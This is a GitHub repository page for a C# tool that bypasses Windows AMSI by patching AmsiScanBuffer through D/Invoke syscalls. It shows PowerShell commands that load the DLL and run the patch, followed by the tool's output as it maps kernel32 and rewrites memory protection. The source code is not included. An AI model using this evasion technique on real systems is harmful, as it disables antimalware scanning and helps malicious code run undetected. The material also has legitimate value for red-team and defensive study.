Skip to content

S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SyscallAmsiScanBufferBypass

AmsiScanBuffer Patch using D/Invoke.

Credit goes to RastaMouses original work.

I was just using TheWovers D/Invoke to port the P/Invoke functions to D/Invoke.

C#

Can be compiled to a DLL and loaded via reflection, or included in a larger .NET Assembly (e.g. SharpSploit).

PS > PS C:\temp> add-type -Path .\SyscallBypass.dll
PS > [Patch.bySyscall]::Patch()

[>] Manually mapping kernel32.dll into current process memory

Successfully allocated memory!
Successfully wrote PE header
Successfully wrote section .text
Successfully wrote section .rdata
Successfully wrote section .data
Successfully wrote section .pdata
Successfully wrote section .rsrc
Successfully wrote section .reloc

[>] Module Base : 24AFF3D0000

[>] Process Handle : 7FFF8DC60000

[>] Patch address : 7FFF8DC62420

[+] NtProtectVirtualMemory success, going to patch it now!

[>] Patching at address : 7FFF8DC62420

[+] NtProtectVirtualMemory set back to oldprotect!

About

AmsiScanBufferBypass using D/Invoke

Resources

Stars

Watchers

Forks

Releases

No releases published

Sponsor this project

 

Packages

No packages published

Languages